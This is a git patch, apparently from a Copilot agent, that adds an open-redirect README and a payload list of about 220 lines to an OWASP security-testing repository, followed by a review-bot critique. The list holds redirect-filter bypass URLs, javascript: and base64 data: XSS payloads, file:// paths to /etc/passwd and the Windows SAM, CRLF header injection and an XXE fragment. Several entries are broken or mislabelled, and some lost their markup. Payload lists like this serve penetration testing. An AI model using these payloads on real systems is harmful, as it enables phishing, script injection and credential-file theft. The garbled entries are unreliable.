From 79cc1966add64ecdf679a8736c2c4bbf4e8f1747 Mon Sep 17 00:00:00 2001
From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com>
Date: Sun, 4 Jan 2026 18:39:07 +0000
Subject: [PATCH] Add open-redirect folder with comprehensive payloads and documentation
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
---
 .../open-redirect/README.md | 34 +++
 .../open-redirect/open-redirect-payloads.txt | 222 ++++++++++++++++++
 2 files changed, 256 insertions(+)
 create mode 100644 OWASP-Top-10/A01-Broken-Access-Control/open-redirect/README.md
 create mode 100644 OWASP-Top-10/A01-Broken-Access-Control/open-redirect/open-redirect-payloads.txt
diff --git a/OWASP-Top-10/A01-Broken-Access-Control/open-redirect/README.md b/OWASP-Top-10/A01-Broken-Access-Control/open-redirect/README.md
new file mode 100644
index 0000000..a13abc4
--- /dev/null
+++ b/OWASP-Top-10/A01-Broken-Access-Control/open-redirect/README.md
@@ -0,0 +1,34 @@
+# Open Redirect Vulnerability
+
+## Description
+Open redirect vulnerabilities occur when a web application accepts user-controllable input that specifies a link to an external site and uses that link in a redirect. This vulnerability can be exploited by attackers to redirect users to malicious websites while making the URL appear legitimate.
+
+## Common Vulnerabilities
+- Unvalidated redirect parameters (e.g., `?url=`, `?redirect=`, `?next=`)
+- Return URL manipulation in authentication flows
+- Post-login redirects
+- Logout redirects
+- URL parameter injection
+- Header-based redirects (e.g., Location, Refresh headers)
+
+## Impact
+- Phishing attacks
+- Credential theft
+- Malware distribution
+- Bypassing security controls (e.g., URL whitelisting)
+- Social engineering attacks
+
+## Testing Approach
+1. Identify redirect parameters in URLs (e.g., `url`, `redirect`, `next`, `return`, `continue`)
+2. Test with external URLs (e.g., `http://evil.com`)
+3. Try various encoding techniques to bypass filters
+4. Test protocol handlers (e.g., `javascript:`, `data:`)
+5. Test absolute and relative paths
+6. Check POST-based redirects in addition to GET parameters
+
+## Prevention
+- Avoid using user-supplied input for redirects
+- Use a mapping of allowed redirect destinations
+- Validate redirect URLs against a whitelist
+- Use relative URLs where possible
+- Implement proper input validation and sanitization
diff --git a/OWASP-Top-10/A01-Broken-Access-Control/open-redirect/open-redirect-payloads.txt b/OWASP-Top-10/A01-Broken-Access-Control/open-redirect/open-redirect-payloads.txt
new file mode 100644
index 0000000..9e56482
--- /dev/null
+++ b/OWASP-Top-10/A01-Broken-Access-Control/open-redirect/open-redirect-payloads.txt
@@ -0,0 +1,222 @@
+# Open Redirect Payloads
+
+## Basic External URLs
+http://evil.com
+https://evil.com
+//evil.com
+///evil.com
+////evil.com
+http://evil.com/
+https://evil.com/
+//evil.com/
+
+## Common Parameter Names to Test
+?url=http://evil.com
+?redirect=http://evil.com
+?next=http://evil.com
+?return=http://evil.com
+?continue=http://evil.com
+?destination=http://evil.com
+?redir=http://evil.com
+?returnTo=http://evil.com
+?returnUrl=http://evil.com
+?redirectUrl=http://evil.com
+?redirect_uri=http://evil.com
+?callback=http://evil.com
+?return_to=http://evil.com
+?goto=http://evil.com
+?target=http://evil.com
+?link=http://evil.com
+?out=http://evil.com
+?view=http://evil.com
+?to=http://evil.com
+?image_url=http://evil.com
+?go=http://evil.com
+?file=http://evil.com
+?val=http://evil.com
+?validate=http://evil.com
+?domain=http://evil.com
+?checkout_url=http://evil.com
+?success=http://evil.com
+?failure=http://evil.com
+?login=http://evil.com
+?logout=http://evil.com
+
+## Protocol Manipulation
+///evil.com
+////evil.com
+/////evil.com
+\\evil.com
+\\\\evil.com
+\/\/evil.com
+/\/\/evil.com
+
+## Using @ Symbol
+http://legitimate.com@evil.com
+https://legitimate.com@evil.com
+//legitimate.com@evil.com
+http://legitimate.com%40evil.com
+
+## URL Encoding
+http%3A%2F%2Fevil.com
+https%3A%2F%2Fevil.com
+%2F%2Fevil.com
+http%3A%2F%2Fevil%2Ecom
+https%3A%2F%2Fevil%2Ecom
+
+## Double URL Encoding
+http%253A%252F%252Fevil.com
+https%253A%252F%252Fevil.com
+%252F%252Fevil.com
+
+## Unicode/UTF-8 Encoding
+http://evil%E3%80%82com
+//evil%E3%80%82com
+//evil%u2215com
+//evil%u2216com
+
+## Null Byte Bypass
+http://evil.com%00.legitimate.com
+https://evil.com%00.legitimate.com
+//evil.com%00.legitimate.com
+
+## Whitespace Bypass
+http://evil.com%20
+http://evil.com%09
+http://evil.com%0a
+http://evil.com%0d
+
+## Using Localhost/Internal IPs
+http://127.0.0.1
+http://localhost
+http://0.0.0.0
+http://[::1]
+http://2130706433 (decimal IP)
+http://0x7f000001 (hex 
IP)
+
+## Domain Manipulation
+http://evil.com.legitimate.com
+http://legitimate.com.evil.com
+http://evil-legitimate.com
+http://legitimate-evil.com
+
+## Subdomain Takeover
+http://subdomain.legitimate.com
+//subdomain.legitimate.com
+
+## XSS via Redirect (javascript: protocol)
+javascript:alert(1)
+javascript:alert('XSS')
+javascript://evil.com%0Aalert(1)
+javascript:eval(atob('YWxlcnQoMSk='))
+
+## Data URI
+data:text/html,
+data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
+
+## File Protocol
+file:///etc/passwd
+file://C:/Windows/System32/config/sam
+
+## Wildcard Bypasses
+http://evil*.com
+http://*.evil.com
+
+## Bypass using Backslash
+http:\\evil.com
+https:\\evil.com
+
+## Using Question Mark
+http://legitimate.com?evil.com
+http://legitimate.com?@evil.com
+
+## Using Hash
+http://legitimate.com#evil.com
+http://legitimate.com#@evil.com
+
+## Bypass with Partial URL
+evil.com
+//evil.com
+///evil.com
+
+## Using Different TLDs
+http://evil.co
+http://evil.io
+http://evil.net
+http://evil.org
+
+## CRLF Injection for Header Manipulation
+%0d%0aLocation:%20http://evil.com
+%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:text/html%0d%0aContent-Length:25%0d%0a%0d%0a
+%0aLocation:%20http://evil.com
+
+## IPv6 Addresses
+http://[::ffff:7f00:1]
+http://[0:0:0:0:0:ffff:127.0.0.1]
+
+## Punycode/IDN Homograph
+http://xn--e1awd7f.com (example using Cyrillic characters)
+http://xn--80a7a.com
+
+## Using Subpaths
+http://legitimate.com/redirect?url=http://evil.com
+http://legitimate.com/redirect?url=//evil.com
+http://legitimate.com/redirect?url=///evil.com
+
+## Combined Techniques
+http://legitimate.com@evil.com?redirect=http://evil.com
+//legitimate.com@evil.com%2F
+http://evil.com%23legitimate.com
+http://evil.com%3Flegitimate.com
+
+## Special Characters
+http://evil。com (using Unicode dot)
+http://evil。com (using full-width dot)
+http://evil%E3%80%82com
+
+## Bypass with URL Fragments
+#http://evil.com
+#//evil.com
+
+## Using 
Meta Refresh
+
+## Mixed Case to Bypass Filters
+HTtp://evil.com
+HttPs://evil.com
+hTTp://evil.com
+
+## Decimal Encoding
+http://1.2.3.4 (where 1.2.3.4 is the decimal representation)
+
+## Octal Encoding
+http://0177.0.0.01 (octal for 127.0.0.1)
+
+## Using Port Numbers
+http://evil.com:80
+http://evil.com:443
+http://evil.com:8080
+
+## Path Confusion
+/http://evil.com
+\/http://evil.com
+//http://evil.com
+
+## Relative Path Manipulation
+../../../evil.com
+..%2F..%2F..%2Fevil.com
+
+## Using Open Graph Protocol
+http://legitimate.com/og?image=http://evil.com/image.jpg
+
+## Flash-based Redirect
+http://legitimate.com/flash.swf?url=http://evil.com
+
+## PDF-based Redirect
+http://legitimate.com/file.pdf#http://evil.com
+
+## Using Referrer Header
+Referer: http://evil.com
+
+## XML External Entity (XXE) for Redirect
+]>&xxe;
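Review bot: Several entries in this hunk embed a human note inside the payload line itself — `http://2130706433 (decimal IP)`, `http://0177.0.0.01 (octal for 127.0.0.1)`, `http://xn--e1awd7f.com (example using Cyrillic characters)` — so any line-oriented consumer of the file will send the annotation as part of the value; move each note to a `#` comment line above the entry, matching the file's own heading style. The `## Decimal Encoding` entry `http://1.2.3.4 (where 1.2.3.4 is the decimal representation)` is not a decimal form at all (the decimal form is already listed under Localhost as `http://2130706433`), and the two "Unicode dot"/"full-width dot" lines under `## Special Characters` are the same string, so one of each should be dropped or corrected. The CRLF, XXE, Referer and `file://` sections describe other vulnerability classes rather than redirect-filter bypasses, and a `javascript:`/`data:` value reaching a Location header is an XSS finding with a different fix, so labelling those sections as such (or moving them to their own folder) keeps triage honest. Each bypass section would also be more useful to a defender if it named the validation mistake it defeats, for example a line such as `# defeats prefix/startswith checks on the trusted host` above `## Using @ Symbol`, since the README's "validate against a whitelist" advice is exactly what these entries are designed to get past when the check is a substring match instead of an exact host comparison after parsing. The Meta Refresh, Data URI and XXE entries appear to have lost their markup in this rendering, so they should be re-checked against the committed file.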